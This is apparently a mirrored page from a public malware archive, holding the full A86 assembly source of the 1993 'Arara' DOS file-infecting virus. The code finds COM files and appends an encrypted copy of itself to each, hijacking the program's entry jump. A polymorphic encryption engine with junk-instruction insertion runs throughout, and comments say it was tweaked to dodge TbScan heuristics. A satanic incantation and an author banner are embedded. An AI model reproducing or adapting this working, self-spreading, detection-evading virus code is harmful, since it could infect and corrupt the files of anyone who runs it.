mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
421 lines
8.0 KiB
NASM
421 lines
8.0 KiB
NASM
|
;
|
|||
|
; [Arara] Virus
|
|||
|
; Generated by [TVG]
|
|||
|
; Minor modifications done to avoid heuristic detection by TbScan
|
|||
|
; Cloaked with a minor polymorphic protection device
|
|||
|
; Created on Monday November 11, 1993
|
|||
|
; Written for compilation in A86 pd assembler
|
|||
|
;
|
|||
|
; This is not a major virus, but I want to see how they react in the Virus
|
|||
|
; summary. Maybe they say it's from Bulgaria because of the language. Well,
|
|||
|
; if you want me to write something (fairly neutral) about satanism for a mag
|
|||
|
; then say it so. I try to keep it interesting...
|
|||
|
;
|
|||
|
; John Tardy
|
|||
|
|
|||
|
|
|||
|
JMP MAIN
|
|||
|
DB '<27>'
|
|||
|
MAIN: CALL GETOFS
|
|||
|
GETOFS: MOV BP,SP
|
|||
|
MOV BP,SS:[BP]
|
|||
|
PUSH AX
|
|||
|
SUB BP,GETOFS
|
|||
|
MAINVIR EQU $
|
|||
|
CALL RANDOMIZE
|
|||
|
MOV AX,[ORGPRG][BP]
|
|||
|
LEA DI,100H
|
|||
|
STOSW
|
|||
|
MOV AX,[ORGPRG][2][BP]
|
|||
|
STOSW
|
|||
|
MOV AH,1AH
|
|||
|
MOV DX,0FD00H
|
|||
|
INT 21H
|
|||
|
CALL CHANGE
|
|||
|
|
|||
|
MOV AH,4EH
|
|||
|
SEARCH: LEA DX,FILESPEC[BP]
|
|||
|
XOR CX,CX
|
|||
|
INT 21H
|
|||
|
JNC NOERROR
|
|||
|
JMP READY
|
|||
|
NOERROR: MOV AX,4300H
|
|||
|
MOV DX,0FD1EH
|
|||
|
INT 21H
|
|||
|
PUSH CX
|
|||
|
MOV AX,4301H
|
|||
|
XOR CX,CX
|
|||
|
INT 21H
|
|||
|
MOV AX,3D02H
|
|||
|
MOV DX,0FD1EH
|
|||
|
INT 21H
|
|||
|
XCHG AX,BX
|
|||
|
MOV AX,5700H
|
|||
|
INT 21H
|
|||
|
PUSH CX
|
|||
|
PUSH DX
|
|||
|
MOV AH,3FH
|
|||
|
LEA DX,ORGPRG[BP]
|
|||
|
MOV CX,4
|
|||
|
INT 21H
|
|||
|
MOV CX,W ORGPRG[BP]
|
|||
|
XOR CX,0FFFFH
|
|||
|
CMP CX,0B2A5H
|
|||
|
JE EXEFILE
|
|||
|
CMP CX,0A5B2H
|
|||
|
JE EXEFILE
|
|||
|
CMP B ORGPRG[BP][3],'<27>'
|
|||
|
JE EXEFILE
|
|||
|
MOV AX,4202H
|
|||
|
XOR CX,CX
|
|||
|
CWD
|
|||
|
INT 21H
|
|||
|
SUB AX,3
|
|||
|
MOV JUMP[1][BP],AX
|
|||
|
PUSH BX
|
|||
|
PUSH AX
|
|||
|
CALL CHANGE
|
|||
|
MOV DS,CS
|
|||
|
LEA SI,MAIN[BP]
|
|||
|
MOV CX,VIRLEN
|
|||
|
MOV ES,CS
|
|||
|
LEA DI,START[BP]
|
|||
|
POP DX
|
|||
|
ADD DX,103H
|
|||
|
MOV AX,3
|
|||
|
|
|||
|
CALL ENCRYPT
|
|||
|
|
|||
|
POP BX
|
|||
|
MOV AH,40H
|
|||
|
MOV DS,CS
|
|||
|
LEA DX,START[BP]
|
|||
|
INT 21H
|
|||
|
|
|||
|
MOV AX,4200H
|
|||
|
XOR CX,CX
|
|||
|
CWD
|
|||
|
INT 21H
|
|||
|
MOV AH,40H
|
|||
|
LEA DX,JUMP[BP]
|
|||
|
MOV CX,4
|
|||
|
INT 21H
|
|||
|
CALL CLOSE
|
|||
|
JMP READY
|
|||
|
EXEFILE: CALL CLOSE
|
|||
|
MOV AH,4FH
|
|||
|
JMP SEARCH
|
|||
|
READY EQU $
|
|||
|
ERROR: MOV AH,1AH
|
|||
|
MOV DX,80H
|
|||
|
INT 21H
|
|||
|
MOV DS,CS
|
|||
|
POP AX
|
|||
|
MOV BX,0FEFFH
|
|||
|
XOR BX,0FFFFH
|
|||
|
JMP BX
|
|||
|
CLOSE: POP SI
|
|||
|
POP DX
|
|||
|
POP CX
|
|||
|
MOV AX,5700H
|
|||
|
INC AX
|
|||
|
INT 21H
|
|||
|
MOV AH,3EH
|
|||
|
INT 21H
|
|||
|
POP CX
|
|||
|
MOV AX,4300H
|
|||
|
INC AX
|
|||
|
MOV DX,0FD1EH
|
|||
|
INT 21H
|
|||
|
MOV DS,CS
|
|||
|
MOV ES,CS
|
|||
|
PUSH SI
|
|||
|
RET
|
|||
|
DB '[ARARA]'
|
|||
|
CHANGE: MOV AX,W WEXL[BP]
|
|||
|
XCHG AL,AH
|
|||
|
MOV W WEXL[BP],AX
|
|||
|
RET
|
|||
|
|
|||
|
;---------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Encryption engine
|
|||
|
;
|
|||
|
;---------------------------------------------------------------------------
|
|||
|
|
|||
|
RANDOMIZE: MOV CX,MTLEN
|
|||
|
INCREASE: MOV SI,CX
|
|||
|
INC B MT[SI][-1][BP]
|
|||
|
LOOP INCREASE
|
|||
|
CHECKIT: MOV CX,MTMAXLEN
|
|||
|
CHECKVAL: MOV SI,CX
|
|||
|
MOV AH,MT[SI][-1][BP]
|
|||
|
MOV AL,MTMAX[SI][-1][BP]
|
|||
|
CMP AH,AL
|
|||
|
JB GOODVAL
|
|||
|
MOV B MT[SI][-1][BP],0
|
|||
|
GOODVAL: LOOP CHECKVAL
|
|||
|
XOR AX,AX
|
|||
|
MOV DS,AX
|
|||
|
NOTZERO: MOV AL,B DS:[046CH]
|
|||
|
OR AL,AL
|
|||
|
JZ NOTZERO
|
|||
|
MOV DS,CS
|
|||
|
MOV ENCRYPTVAL[BP],AL
|
|||
|
RET
|
|||
|
|
|||
|
DUMMY1 DW 0 ; offset mov bx,si,di
|
|||
|
DUMMY2 DW 0 ; offset loop
|
|||
|
CALNEWCX DW 0
|
|||
|
|
|||
|
ENCRYPT: PUSH DS
|
|||
|
PUSH SI
|
|||
|
PUSH CX
|
|||
|
|
|||
|
MOV AMOUNT[BP],AX
|
|||
|
|
|||
|
MOV COUNTLOOP[BP],CX
|
|||
|
|
|||
|
MOV CALNEWCX[BP],DI
|
|||
|
|
|||
|
LEA SI,MT[BP]
|
|||
|
|
|||
|
CALL INSERTGARBAGE
|
|||
|
XOR AX,AX
|
|||
|
|
|||
|
LODSB
|
|||
|
PUSH AX
|
|||
|
LEA BX,VAL2T[BP]
|
|||
|
CALL USETABLE
|
|||
|
ADD AX,W [COUNTLOOP][BP]
|
|||
|
STOSW
|
|||
|
LODSB
|
|||
|
PUSH AX
|
|||
|
CALL INSERTGARBAGE
|
|||
|
LEA BX,VAL3SUB[BP]
|
|||
|
CALL USETABLE
|
|||
|
POP AX
|
|||
|
SHL AX,2
|
|||
|
POP BX
|
|||
|
ADD AX,BX
|
|||
|
LEA BX,VAL3T[BP]
|
|||
|
CALL USETABLE
|
|||
|
CALL INSERTGARBAGE
|
|||
|
|
|||
|
LODSB
|
|||
|
PUSH AX
|
|||
|
PUSH AX
|
|||
|
LEA BX,VAL1T[BP]
|
|||
|
CALL USETABLE
|
|||
|
MOV DUMMY1[BP],DI
|
|||
|
STOSW
|
|||
|
CALL INSERTGARBAGE
|
|||
|
|
|||
|
MOV DUMMY2[BP],DI
|
|||
|
LODSB
|
|||
|
LEA BX,VAL4T[BP]
|
|||
|
CALL USETABLE
|
|||
|
POP BX
|
|||
|
LODSB
|
|||
|
MOV FUNCTION[BP],AL
|
|||
|
SHL AX,2
|
|||
|
ADD AX,BX
|
|||
|
LEA BX,VAL5T[BP]
|
|||
|
CALL USETABLE
|
|||
|
MOV AL,B [ENCRYPTVAL][BP]
|
|||
|
STOSB
|
|||
|
CALL INSERTGARBAGE
|
|||
|
POP AX
|
|||
|
LEA BX,VAL6T[BP]
|
|||
|
CALL USETABLE
|
|||
|
LODSB
|
|||
|
LEA BX,VAL7T[BP]
|
|||
|
CALL USETABLE
|
|||
|
MOV AX,DI
|
|||
|
MOV BX,DUMMY2[BP]
|
|||
|
SUB AX,BX
|
|||
|
NOT AX
|
|||
|
STOSB
|
|||
|
PUSH DI
|
|||
|
MOV AX,CALNEWCX[BP]
|
|||
|
SUB DI,AX
|
|||
|
ADD DI,DX
|
|||
|
MOV AX,DI
|
|||
|
MOV DI,DUMMY1[BP]
|
|||
|
STOSW
|
|||
|
POP DI
|
|||
|
|
|||
|
POP CX
|
|||
|
POP SI
|
|||
|
POP DS
|
|||
|
|
|||
|
CODEIT: LODSB
|
|||
|
CMP B FUNCTION[BP],0
|
|||
|
JNE WHATELSE1
|
|||
|
XOR AL,ENCRYPTVAL[BP]
|
|||
|
JMP NOELSE
|
|||
|
WHATELSE1: CMP B FUNCTION[BP],1
|
|||
|
JNE WHATELSE2
|
|||
|
SUB AL,ENCRYPTVAL[BP]
|
|||
|
JMP NOELSE
|
|||
|
WHATELSE2: ADD AL,ENCRYPTVAL[BP]
|
|||
|
NOELSE: STOSB
|
|||
|
LOOP CODEIT
|
|||
|
MOV CX,CALNEWCX[BP]
|
|||
|
SUB DI,CX
|
|||
|
MOV CX,DI
|
|||
|
RET
|
|||
|
|
|||
|
USETABLE:
|
|||
|
XLAT
|
|||
|
STOSB
|
|||
|
RET
|
|||
|
|
|||
|
INSERTGARBAGE: PUSH DS
|
|||
|
PUSH SI
|
|||
|
PUSH AX
|
|||
|
PUSH CX
|
|||
|
PUSH DS
|
|||
|
PUSH SI
|
|||
|
XOR AX,AX
|
|||
|
MOV DS,AX
|
|||
|
MOV AX,WORD PTR DS:[046CH]
|
|||
|
ADD AX,DI
|
|||
|
SUB AX,SI
|
|||
|
ADD AX,BP
|
|||
|
ADD AX,WORD PTR CS:[DI][BP]
|
|||
|
ADD AL,AH
|
|||
|
ADD AX,CX
|
|||
|
AND AX,02H
|
|||
|
AMOUNT EQU $-2
|
|||
|
MOV CX,AX
|
|||
|
AND AX,7H
|
|||
|
POP SI
|
|||
|
POP DS
|
|||
|
CMP CX,0
|
|||
|
JE NOGARBAGE
|
|||
|
INSERT: LEA BX,RANDOMCODE[BP]
|
|||
|
CALL USETABLE
|
|||
|
ADD AX,DI
|
|||
|
ADD AX,SI
|
|||
|
ADD AX,WORD PTR CS:[DI][BP]
|
|||
|
AND AX,7
|
|||
|
LOOP INSERT
|
|||
|
NOGARBAGE: POP CX
|
|||
|
POP AX
|
|||
|
POP SI
|
|||
|
POP DS
|
|||
|
RET
|
|||
|
|
|||
|
MTMAX DB 4 ; MT 0
|
|||
|
DB 10 ; MT 1
|
|||
|
DB 3 ; MT 2
|
|||
|
DB 2 ; MT 4
|
|||
|
DB 3 ; MT 5
|
|||
|
DB 2 ; MT 6
|
|||
|
DB 6 ; MT 7
|
|||
|
MTMAXLEN EQU $-MTMAX
|
|||
|
|
|||
|
MT DB 0 ; MT 0
|
|||
|
DB 0 ; MT 1
|
|||
|
DB 0 ; MT 2
|
|||
|
DB 0 ; MT 4
|
|||
|
DB 0 ; MT 5
|
|||
|
DB 0 ; MT 6
|
|||
|
DB 0 ; MT 7
|
|||
|
MTLEN EQU $-MT
|
|||
|
|
|||
|
; Offset Encrypted part
|
|||
|
ENCOFS DW 0
|
|||
|
|
|||
|
; Counterloop decryption
|
|||
|
COUNTLOOP DW 0
|
|||
|
|
|||
|
; Encryption Valua
|
|||
|
ENCRYPTVAL DB 0
|
|||
|
|
|||
|
; Function
|
|||
|
FUNCTION DB 0 ; 0=xor, 1=add, 2=sub (xchange in encr)
|
|||
|
|
|||
|
; MT 0
|
|||
|
VAL1T DB 0BBH,0BEH,0BFH ; Mov Bx,Si,Di
|
|||
|
|
|||
|
; MT 1
|
|||
|
VAL2T DB 0B8H,0BBH,0BAH,0BDH ; Mov Ax,Bx,Dx,Bp
|
|||
|
|
|||
|
; MT 2 V
|
|||
|
VAL3SUB DB 089H, 087H, 087H, 031H, 001H, 009H
|
|||
|
|
|||
|
DB 08BH, 033H, 003H, 00BH ; NIEUW
|
|||
|
|
|||
|
; MT 1 H
|
|||
|
VAL3T DB 0C1H,0D9H,0D1H,0E9H ; Mov Ax,Bx,Dx,Bp -> Cx
|
|||
|
DB 0C1H,0CBH,0CAH,0CDH ; Xchg Ax,Bx,Dx,Bp -> Cx
|
|||
|
DB 0C1H,0D9H,0D1H,0E9H ; Xchg Ax,Bx,Dx,Bp <- Cx
|
|||
|
DB 0C1H,0D9H,0D1H,0E9H ; Xor Ax,Bx,Dx,Bp -> Cx
|
|||
|
DB 0C1H,0D9H,0D1H,0E9H ; Add Ax,Bx,Dx,Bp -> Cx
|
|||
|
DB 0C1H,0D9H,0D1H,0E9H ; Or Ax,Bx,Dx,Bp -> Cx
|
|||
|
|
|||
|
DB 0C8H,0CBH,0CAH,0CDH ; NIEUW
|
|||
|
DB 0C8H,0CBH,0CAH,0CDH ;
|
|||
|
DB 0C8H,0CBH,0CAH,0CDH ;
|
|||
|
DB 0C8H,0CBH,0CAH,0CDH ;
|
|||
|
|
|||
|
|
|||
|
|
|||
|
; MT 4 H
|
|||
|
VAL4T DB 080H,082H ; 00 / 0000
|
|||
|
|
|||
|
; MT 5 V
|
|||
|
; MT 0 H
|
|||
|
VAL5T DB 037H,034H,035H,037H ; Xor Bx,Si,Di,bx
|
|||
|
DB 007H,004H,005H,007H ; Add Bx,Si,Di,bx
|
|||
|
DB 02FH,02CH,02DH,02FH ; Sub Bx,Si,Di,bx
|
|||
|
|
|||
|
; MT 0 H
|
|||
|
VAL6T DB 043H,046H,047H ; Inc Bx,Si,Di
|
|||
|
|
|||
|
; MT 6 H
|
|||
|
VAL7T DB 0E0H,0E2H ; Loop Equal Functions
|
|||
|
|
|||
|
; MT 7 H
|
|||
|
RANDOMCODE DB 0FCH,0F8H,090H,0F9H,0F5H ; Random code
|
|||
|
DB 0CCH,0FBH,02EH,0F5H
|
|||
|
|
|||
|
|
|||
|
FILESPEC DB '*.OCM',0
|
|||
|
WEXL EQU FILESPEC+2
|
|||
|
JUMP DB 0E9H
|
|||
|
DW 0
|
|||
|
DB '<27>'
|
|||
|
ORGPRG DB 0CDH,020H,'AR'
|
|||
|
|
|||
|
;
|
|||
|
; The Eighteenth Enochian Key opens the gates of Hell and casts up Lucifer
|
|||
|
; and his blessing.
|
|||
|
;
|
|||
|
; Enochian
|
|||
|
DB 13,10,'ILASA MICALAZODA OLAPIRETA IALPEREJI BELIORE: DAS ODO BUSADIRE OIAD OUOARESA'
|
|||
|
DB 13,10,'CAOSAGO: CASAREMEJI LAIADA ERANU BERINUTASA CAFAFAME DAS IVEMEDA AQOSO ADOHO'
|
|||
|
DB 13,10,'MOZ, OD MAOFASA. BOLAPE COMO BELIORETA PAMEBETA. ZODACARE OD ZODAMERANU! ODO'
|
|||
|
DB 13,10,'CICALE QAA. ZODOREJE, LAPE ZODIREDO NOCO MADA, HOATHAHE SAITAN!'
|
|||
|
; English
|
|||
|
; O thou mighty light and burning flame of comfort!, that unveilest the glory
|
|||
|
; of Satan to the center of the Earth; in whom the great secrets of truth
|
|||
|
; have their abiding; that is called in thy kingdom: "strength through joy,"
|
|||
|
; and is not to be measured. Be thou a window of comfort unto me. Move there-
|
|||
|
; fore, and appear! Open the mysteries of your creation! Be friendly unto me,
|
|||
|
; for I am the same!, the true worshipper of the highest end ineffable King
|
|||
|
; of Hell!
|
|||
|
START EQU $
|
|||
|
|
|||
|
|
|||
|
|
|||
|
VIRLEN EQU $-MAIN
|
|||
|
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|